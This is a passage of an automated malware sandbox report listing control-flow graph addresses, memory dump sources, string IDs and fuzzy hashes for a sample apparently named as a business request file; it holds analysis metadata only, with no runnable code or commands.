                                                                                                                                                    control_flow_graph 1962 7ddcb0-7ddce0 1963 7ddcee-7ddd5a 1962->1963 1964 7ddce2-7ddce4 1962->1964 1974 7ddd5c-7ddd5e 1963->1974 1975 7ddd68-7ddd87 1963->1975 1964->1963 1974->1975 1979 7ddd8d-7ddd9a 1975->1979 1980 7de21b-7de246 1975->1980 1981 7ddd9c-7ddda9 1979->1981 1982 7dddab 1979->1982 1985 7de24d-7de289 1980->1985 1984 7dddad-7dddaf 1981->1984 1982->1984 1984->1985 1986 7dddb5-7dddd6 1984->1986 2002 7de290-7de2bb 1985->2002 1991 7ddddc-7dde16 1986->1991 1992 7dde64-7dded6 1986->1992 2000 7dde18-7dde28 1991->2000 2001 7dde2a-7dde37 1991->2001 2006 7ddee9 1992->2006 2007 7dded8-7ddee7 1992->2007 2009 7dde39-7dde3d 2000->2009 2001->2009 2031 7de2c2-7de30d 2002->2031 2010 7ddeeb-7ddeed 2006->2010 2007->2010 2014 7dde3f-7dde41 2009->2014 2015 7dde43 2009->2015 2016 7ddeef-7ddf1d 2010->2016 2017 7ddf25-7ddf31 2010->2017 2020 7dde4b-7dde5d 2014->2020 2015->2020 2016->2017 2018 7ddf71-7ddf88 2017->2018 2019 7ddf33-7ddf38 2017->2019 2030 7ddf8e 2018->2030 2018->2031 2105 7ddf3b call 7de328 2019->2105 2106 7ddf3b call 7ddbb0 2019->2106 2107 7ddf3b call 7ddcb0 2019->2107 2020->1992 2024 7ddf3d-7ddf49 2024->2002 2032 7ddf4f-7ddfc7 2024->2032 2030->2032 2045 7de31c-7de341 2031->2045 2046 7de30f-7de315 2031->2046 2051 7ddfce-7ddfef 2032->2051 2047 7de34d-7de36a 2045->2047 2048 7de343 2045->2048 2052 7de36c 2047->2052 2053 7de376-7de386 2047->2053 2048->2047 2059 7ddff9-7ddffd 2051->2059 2060 7ddff1 2051->2060 2052->2053 2057 7de38e-7de395 2053->2057 2061 7ddfff-7de012 2059->2061 2062 7de017-7de03e 2059->2062 2060->2059 2063 7de095-7de0cc 2061->2063 2071 7de048-7de086 2062->2071 2072 7de040 2062->2072 2068 7de10c-7de113 2063->2068 2069 7de0ce-7de107 2063->2069 2073 7de115-7de124 2068->2073 2074 7de133-7de13a 2068->2074 2069->2068 2096 7de088 2071->2096 2097 7de090 2071->2097 2072->2071 2073->2074 2083 7de126-7de12c 2073->2083 2075 7de13c-7de14c 2074->2075 2076 7de14e-7de154 2074->2076 2081 7de15e-7de160 2075->2081 2076->2081 2085 7de16a-7de18c 2081->2085 2086 7de162 2081->2086 2083->2074 2091 7de18e-7de198 2085->2091 2092 7de1e3 2085->2092 2086->2085 2093 7de1ac-7de1b9 2091->2093 2094 7de19a-7de1aa 2091->2094 2092->1980 2100 7de1bb-7de1bf 2093->2100 2094->2100 2096->2097 2097->2063 2102 7de1c5 2100->2102 2103 7de1c1-7de1c3 2100->2103 2104 7de1cd-7de1dc 2102->2104 2103->2104 2104->2092 2105->2024 2106->2024 2107->2024
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.420080510.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_7d0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: Hp$PHp$h~
                                                                                                                                                    • API String ID: 0-176380224
                                                                                                                                                    • Opcode ID: 0bcbe746f4676f53566d93fa28bd33e77c8920ee191385d77643cd1c1d62325c
                                                                                                                                                    • Instruction ID: 8e93a34e56a194163be5de766a3afeebbcd1ed986e59e90c71eaa951cf56ecbb
                                                                                                                                                    • Opcode Fuzzy Hash: 0bcbe746f4676f53566d93fa28bd33e77c8920ee191385d77643cd1c1d62325c
                                                                                                                                                    • Instruction Fuzzy Hash: C2D15D30A00706DFD725DF79C440BAEB7B2AF88314F648A2AE4059B795DB75EC86CB50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 2108 602a48-602a83 2110 602a85-602a9b 2108->2110 2111 602ad9-602b04 2108->2111 2116 602ab3-602ac1 2110->2116 2117 602a9d-602aa3 2110->2117 2114 602b32-602b3e 2111->2114 2115 602b06-602b09 2111->2115 2125 602b40-602b42 2114->2125 2126 602b61-602b65 2114->2126 2177 602b0b call 603157 2115->2177 2178 602b0b call 603168 2115->2178 2118 602ac3 2116->2118 2119 602acc-602ad6 2116->2119 2120 602aa5 2117->2120 2121 602aa7-602aa9 2117->2121 2118->2119 2120->2116 2121->2116 2122 602b11-602b13 2122->2114 2124 602b15-602b17 2122->2124 2130 602b25-602b2f 2124->2130 2131 602b19-602b1f 2124->2131 2125->2126 2127 602b44-602b5f 2125->2127 2128 602cb3-602cbd 2126->2128 2129 602b6b-602b91 2126->2129 2127->2126 2138 602b93 2129->2138 2139 602b98-602b9a 2129->2139 2131->2130 2132 602cdf-602d10 2131->2132 2140 602d41-602d48 2132->2140 2141 602d12 2132->2141 2138->2139 2142 602bba-602bc0 2139->2142 2143 602b9c-602bb4 2139->2143 2146 602d15-602d1b 2141->2146 2144 602bc2 2142->2144 2145 602bca-602be3 2142->2145 2151 602bb6-602bb8 2143->2151 2152 602be8-602c38 call 601278 2143->2152 2144->2145 2147 602c95-602ca5 2145->2147 2148 602d4b-602de4 2146->2148 2149 602d1d-602d30 2146->2149 2161 602cb0 2147->2161 2162 602ca7 2147->2162 2159 602d32-602d38 2149->2159 2160 602d3b-602d3f 2149->2160 2151->2142 2151->2152 2167 602c3a-602c5c call 601278 2152->2167 2168 602c5e 2152->2168 2160->2140 2160->2146 2161->2128 2162->2161 2169 602c61-602c65 2167->2169 2168->2169 2172 602c80-602c93 2169->2172 2173 602c67-602c69 call 6044c0 2169->2173 2172->2147 2175 602c6f-602c75 2173->2175 2175->2172 2177->2122 2178->2122
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 8xR$8xR$8xR
                                                                                                                                                    • API String ID: 0-1689087184
                                                                                                                                                    • Opcode ID: a5b2be6ae1cf2d747dc0cf78eaec082b9e06cbd4edcf69fb6c46f3fb1c51629c
                                                                                                                                                    • Instruction ID: e497b7c5222f15da289e9039f9f455e48f860cf680179b18f30e3622d6437ee7
                                                                                                                                                    • Opcode Fuzzy Hash: a5b2be6ae1cf2d747dc0cf78eaec082b9e06cbd4edcf69fb6c46f3fb1c51629c
                                                                                                                                                    • Instruction Fuzzy Hash: E6A19F35B412059FCB19CF64D898AAEBBB2FF89311F24406AE811DB391CB35DD46CB50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 2278 61d530-61d553 2279 61d630-61d636 call 61d490 2278->2279 2280 61d558-61d55d 2278->2280 2301 61d5d4-61d5dc 2279->2301 2305 61d5e1 call 61d800 2301->2305 2306 61d5e1 call 61d7fa 2301->2306 2302 61d5e7-61d603 2302->2280 2305->2302 2306->2302
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: fp$ fp$4'p
                                                                                                                                                    • API String ID: 0-1404245427
                                                                                                                                                    • Opcode ID: 154b6bfc3278295974b9d97f21010cabd37bf77a4a1bb3cd882f4ec5fad457f3
                                                                                                                                                    • Instruction ID: fc260a74e76dd01f1e643153d44e6518960cb30d378a487c53f9a65f049be3e9
                                                                                                                                                    • Opcode Fuzzy Hash: 154b6bfc3278295974b9d97f21010cabd37bf77a4a1bb3cd882f4ec5fad457f3
                                                                                                                                                    • Instruction Fuzzy Hash: BE21E13090124ADFCB05EFA8D4516FDBBB2FF80300F54056AD006AB355DB30AE46DBA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 2307 61d540-61d636 call 61d490 2334 61d5e1 call 61d800 2307->2334 2335 61d5e1 call 61d7fa 2307->2335 2330 61d5e7-61d603 2334->2330 2335->2330
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: fp$ fp$4'p
                                                                                                                                                    • API String ID: 0-1404245427
                                                                                                                                                    • Opcode ID: a1573db1939395a2ef7cec5e6ff1773e8bcbec3942574b62a257a6778b980f24
                                                                                                                                                    • Instruction ID: a35caa2e550d85c23180e6f6f33cb1d11f7110d24328cc536ffc8e3fe07b2e36
                                                                                                                                                    • Opcode Fuzzy Hash: a1573db1939395a2ef7cec5e6ff1773e8bcbec3942574b62a257a6778b980f24
                                                                                                                                                    • Instruction Fuzzy Hash: 4A219D7091124A9FCB04EFA8D4516FDBBB3FF84304F54482AD416AB355DB30AE46DBA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419429408.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_4f0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 4'p$4'p
                                                                                                                                                    • API String ID: 0-3973980265
                                                                                                                                                    • Opcode ID: 2b7f7f4ec383e4fa0ee11b4c89d5dcddae20474538ff5507bced3531fa69990c
                                                                                                                                                    • Instruction ID: 06441d88f6871641a655e0d72cddc8b7cfe1c43515d796346d3a41273832f312
                                                                                                                                                    • Opcode Fuzzy Hash: 2b7f7f4ec383e4fa0ee11b4c89d5dcddae20474538ff5507bced3531fa69990c
                                                                                                                                                    • Instruction Fuzzy Hash: 7582D830F01229CF8B391BB9551423F69D6AF96750F24552BCB02D73E8DE78CC0697AA
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 2879 7d0040-7d0090 2881 7d0097-7d00a9 2879->2881 2882 7d0092 2879->2882 2884 7d00b8-7d00c4 2881->2884 2885 7d00ab 2881->2885 2882->2881 2886 7d00ca-7d00cf 2884->2886 2887 7d0757 2884->2887 3052 7d00b2 call 7d1119 2885->3052 3053 7d00b2 call 7d1265 2885->3053 2888 7d00d1-7d00da 2886->2888 2889 7d0102-7d0122 2886->2889 2890 7d075c-7d0760 2887->2890 2888->2887 2891 7d00e0-7d00fd 2888->2891 2889->2887 2903 7d0128-7d01f8 2889->2903 2892 7d0713-7d072a 2890->2892 2893 7d0762 2890->2893 2894 7d0856-7d085c 2891->2894 2920 7d0735-7d074c 2892->2920 2896 7d0769-7d0786 2893->2896 2897 7d078b-7d07ad 2893->2897 2898 7d07f4-7d081a 2893->2898 2899 7d07d3-7d07f2 2893->2899 2900 7d07b2-7d07d1 2893->2900 2901 7d085e 2894->2901 2902 7d0866 2894->2902 2919 7d0849-7d0851 2896->2919 2897->2919 2921 7d081c-7d0833 2898->2921 2922 7d0843 2898->2922 2899->2919 2900->2919 2901->2902 2910 7d0867 2902->2910 2940 7d01fe-7d020a 2903->2940 2941 7d03d4-7d0405 2903->2941 2910->2910 2919->2894 2920->2887 2921->2887 2927 7d0839-7d0841 2921->2927 2922->2919 2927->2921 2927->2922 2940->2887 2942 7d0210-7d0257 2940->2942 2949 7d046a-7d049b 2941->2949 2950 7d0407-7d0433 2941->2950 2957 7d0259-7d0262 2942->2957 2958 7d0264-7d0270 2942->2958 2961 7d058d-7d05d5 2949->2961 2962 7d04a1-7d052e 2949->2962 2963 7d044d-7d0468 2950->2963 2964 7d0435-7d0438 2950->2964 2957->2958 2968 7d027c-7d0288 2958->2968 2969 7d0272-7d0277 2958->2969 2974 7d05d7-7d062c 2961->2974 2975 7d0632-7d0676 2961->2975 3010 7d0550-7d0553 2962->3010 3011 7d0530-7d054e 2962->3011 2963->2949 2963->2950 2964->2963 2967 7d043a-7d044a 2964->2967 2967->2963 2977 7d028a-7d028f 2968->2977 2978 7d0294-7d02a0 2968->2978 2973 7d03bc-7d03ce 2969->2973 2973->2940 2973->2941 2974->2975 2996 7d0678-7d06a8 2975->2996 2997 7d06e5-7d070e 2975->2997 2977->2973 2985 7d02ac-7d02b8 2978->2985 2986 7d02a2-7d02a7 2978->2986 2992 7d02ba-7d02bf 2985->2992 2993 7d02c4-7d02d0 2985->2993 2986->2973 2992->2973 3000 7d02dc-7d02e8 2993->3000 3001 7d02d2-7d02d7 2993->3001 2996->2920 3019 7d06ae-7d06b6 2996->3019 2997->2894 3006 7d02ea-7d02ef 3000->3006 3007 7d02f4-7d0300 3000->3007 3001->2973 3006->2973 3016 7d030c-7d0318 3007->3016 3017 7d0302-7d0307 3007->3017 3013 7d0555-7d0564 3010->3013 3014 7d0566 3010->3014 3022 7d0572-7d0587 3011->3022 3013->3022 3014->3022 3027 7d031a-7d031f 3016->3027 3028 7d0324-7d0330 3016->3028 3017->2973 3019->2887 3021 7d06bc-7d06c3 3019->3021 3021->2890 3025 7d06c9-7d06e3 3021->3025 3022->2961 3022->2962 3025->2996 3025->2997 3027->2973 3032 7d033c-7d0348 3028->3032 3033 7d0332-7d0337 3028->3033 3035 7d034a-7d034f 3032->3035 3036 7d0351-7d035d 3032->3036 3033->2973 3035->2973 3038 7d035f-7d0364 3036->3038 3039 7d0366-7d0372 3036->3039 3038->2973 3041 7d037b-7d0387 3039->3041 3042 7d0374-7d0379 3039->3042 3044 7d0389-7d038e 3041->3044 3045 7d0390-7d039c 3041->3045 3042->2973 3044->2973 3047 7d039e-7d03a3 3045->3047 3048 7d03a5-7d03b1 3045->3048 3047->2973 3050 7d03ba 3048->3050 3051 7d03b3-7d03b8 3048->3051 3050->2973 3051->2973 3052->2884 3053->2884
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.420080510.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_7d0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 2$$p
                                                                                                                                                    • API String ID: 0-255402429
                                                                                                                                                    • Opcode ID: 6e8c6c32d9c34aa177c62b350702a1e4888240db736698e201e38957851c82c8
                                                                                                                                                    • Instruction ID: 0f49bc6229f692d49c8ddb4a1173c256b9530146c2ce26e486d6569e0607e227
                                                                                                                                                    • Opcode Fuzzy Hash: 6e8c6c32d9c34aa177c62b350702a1e4888240db736698e201e38957851c82c8
                                                                                                                                                    • Instruction Fuzzy Hash: 80322D74A01205CFCB24DF68D895B5DBBB2BF88300F2094AAD40ADB766DB34AD45CF91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: $p$$p
                                                                                                                                                    • API String ID: 0-580715581
                                                                                                                                                    • Opcode ID: ef364518d17ac73e3dccb142ba41e9413b75f8328f0d92a02b9f19eee432ec70
                                                                                                                                                    • Instruction ID: 03d4044b9cff2b35b0cc78072129e0240850748c10584326fb663bda8d7526ab
                                                                                                                                                    • Opcode Fuzzy Hash: ef364518d17ac73e3dccb142ba41e9413b75f8328f0d92a02b9f19eee432ec70
                                                                                                                                                    • Instruction Fuzzy Hash: 9F225D31A40229CFCB19DFA4D854AEEBBB2FF58301F148515E811A73E4DB74AE56CB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: \{R$\{R
                                                                                                                                                    • API String ID: 0-1500987980
                                                                                                                                                    • Opcode ID: f92275be6152e869fa71a88d602f1bd03e5d4df569c94ea7b62b23e27c76ef12
                                                                                                                                                    • Instruction ID: fe2c3c3970779dd976f3402c6d149731af79749202e8daff586c9542907c9024
                                                                                                                                                    • Opcode Fuzzy Hash: f92275be6152e869fa71a88d602f1bd03e5d4df569c94ea7b62b23e27c76ef12
                                                                                                                                                    • Instruction Fuzzy Hash: 40120C34A002158FDB58EF64C894B9DB7B2BF89300F5485A9E549AB3A6DF70ED85CF40
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 4'p$4'p
                                                                                                                                                    • API String ID: 0-3973980265
                                                                                                                                                    • Opcode ID: 012b106436c838991c20c67e3ffa1d8de1613113198280748454da0554359b56
                                                                                                                                                    • Instruction ID: 1bd8768ef683137df8b5004fd0b350a2ab1ee54290fe26ddfd5a261e357cb8d7
                                                                                                                                                    • Opcode Fuzzy Hash: 012b106436c838991c20c67e3ffa1d8de1613113198280748454da0554359b56
                                                                                                                                                    • Instruction Fuzzy Hash: E3C1DC74B40218DFDB58EFA8C995A9EB7B2FF89300F104569E505AB3A5DB31EC42CB50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (p$(p
                                                                                                                                                    • API String ID: 0-216383650
                                                                                                                                                    • Opcode ID: 533ea28dc503fed572f372313debeb6a05e8230061e2a6cd64ed8996b2eaf96e
                                                                                                                                                    • Instruction ID: 1c9388bd37f2db474817efcd59731d87db803e0ca93ba2130465280d752bb911
                                                                                                                                                    • Opcode Fuzzy Hash: 533ea28dc503fed572f372313debeb6a05e8230061e2a6cd64ed8996b2eaf96e
                                                                                                                                                    • Instruction Fuzzy Hash: D371F130A057509FC714CB38D854A9EBFE6FF86310B18855EE44ACB792DA30EC06CB92
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (p$Hp
                                                                                                                                                    • API String ID: 0-3691929625
                                                                                                                                                    • Opcode ID: f6f8e16fd0b0822c0709347c97280905f914e984a3422dac6e9fcc1d5b7ca11a
                                                                                                                                                    • Instruction ID: 40825a694b3345d67676298c940f2567a3825e31132a117d9f725b8ba3b593e8
                                                                                                                                                    • Opcode Fuzzy Hash: f6f8e16fd0b0822c0709347c97280905f914e984a3422dac6e9fcc1d5b7ca11a
                                                                                                                                                    • Instruction Fuzzy Hash: 0461F1307007954FCB259B7894246EE7FE2AF82304B18456EE946CF396DA34DD47C792
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (p$,p
                                                                                                                                                    • API String ID: 0-2293223000
                                                                                                                                                    • Opcode ID: 6a0b5cddfe733ac3183af43a979624f22a3ae00aa14d9b4df85c6cf3ec447eca
                                                                                                                                                    • Instruction ID: 3f12e10a408580a501f25905dd9c26852d621ccb75cca639cd4ef6375fa0692f
                                                                                                                                                    • Opcode Fuzzy Hash: 6a0b5cddfe733ac3183af43a979624f22a3ae00aa14d9b4df85c6cf3ec447eca
                                                                                                                                                    • Instruction Fuzzy Hash: CD41F6327041986FCF128EE9AC108FF7FEEAF89211B08406BFA15D7291C929CD1597B1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419429408.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_4f0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 4'p$4'p
                                                                                                                                                    • API String ID: 0-3973980265
                                                                                                                                                    • Opcode ID: 6eaf63c39da6fa86135ad59371de081dedb39dc53ffe49fa3711e107e680288c
                                                                                                                                                    • Instruction ID: 56bddce367837420cc537e563bf676f71974b13b724462beed85fbb6cda2bae1
                                                                                                                                                    • Opcode Fuzzy Hash: 6eaf63c39da6fa86135ad59371de081dedb39dc53ffe49fa3711e107e680288c
                                                                                                                                                    • Instruction Fuzzy Hash: 7D318030B04225474F697A34102117F15CB9FD1792719452FEA47DB385DF9C8E4253EA
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (p$@)R
                                                                                                                                                    • API String ID: 0-1515272460
                                                                                                                                                    • Opcode ID: 2321e94d89ca7bb04e8c3a62e7ebdd54057d177c32c2cde1c59d38d0b29a70fc
                                                                                                                                                    • Instruction ID: 9edaabc4ece1522b3019c2b33218f7cdc47930166d48fb8cedcc9cb7496f2dae
                                                                                                                                                    • Opcode Fuzzy Hash: 2321e94d89ca7bb04e8c3a62e7ebdd54057d177c32c2cde1c59d38d0b29a70fc
                                                                                                                                                    • Instruction Fuzzy Hash: 762109357402516FDB095B68E844AAF7FA6EFCA320B15813AF909CB391CE718C06C7A0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: p`p$p`p
                                                                                                                                                    • API String ID: 0-2869643528
                                                                                                                                                    • Opcode ID: 541152c236d1675e4cc867ff8b6b11d02ad911ba8913c53808f179cefd70e6d2
                                                                                                                                                    • Instruction ID: c7fda026ed48ca96b77e6f4c49c531e49dcb5dbd935e675b00851b7c3e56701a
                                                                                                                                                    • Opcode Fuzzy Hash: 541152c236d1675e4cc867ff8b6b11d02ad911ba8913c53808f179cefd70e6d2
                                                                                                                                                    • Instruction Fuzzy Hash: 6B312431A042648FC715CF6CD8908AEBFF5EF85311B1544AAE501DB362CA30DE05CBA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (p$Hp
                                                                                                                                                    • API String ID: 0-3691929625
                                                                                                                                                    • Opcode ID: 28b2dda4080f00552a8ee20ded9cbf9067a3e6e11ed58b2b1010504e5e125851
                                                                                                                                                    • Instruction ID: d8ca604a0c11621d5dcd3e1f1ee47719669e29da884b5d5912bce4720bfb4c8b
                                                                                                                                                    • Opcode Fuzzy Hash: 28b2dda4080f00552a8ee20ded9cbf9067a3e6e11ed58b2b1010504e5e125851
                                                                                                                                                    • Instruction Fuzzy Hash: 622102317043445FC706D768E850AAE7FE6AFC630071585AAE509CB3A6DE349D0B87A2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (p$(p
                                                                                                                                                    • API String ID: 0-216383650
                                                                                                                                                    • Opcode ID: e7793aafa6fcd34dd0736a0afb2dda99f5fbe8b3566eb0e0614e7ed6b881685d
                                                                                                                                                    • Instruction ID: dff42571aac500b73a38ff4ca5b138d6510d83fd2d13743db913b55af406242d
                                                                                                                                                    • Opcode Fuzzy Hash: e7793aafa6fcd34dd0736a0afb2dda99f5fbe8b3566eb0e0614e7ed6b881685d
                                                                                                                                                    • Instruction Fuzzy Hash: 53113A317042405FC7155768A824BAE3FA6EBC9365F19806AE80DCB386CE399D02C3A2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: ,DR$,DR
                                                                                                                                                    • API String ID: 0-1276929395
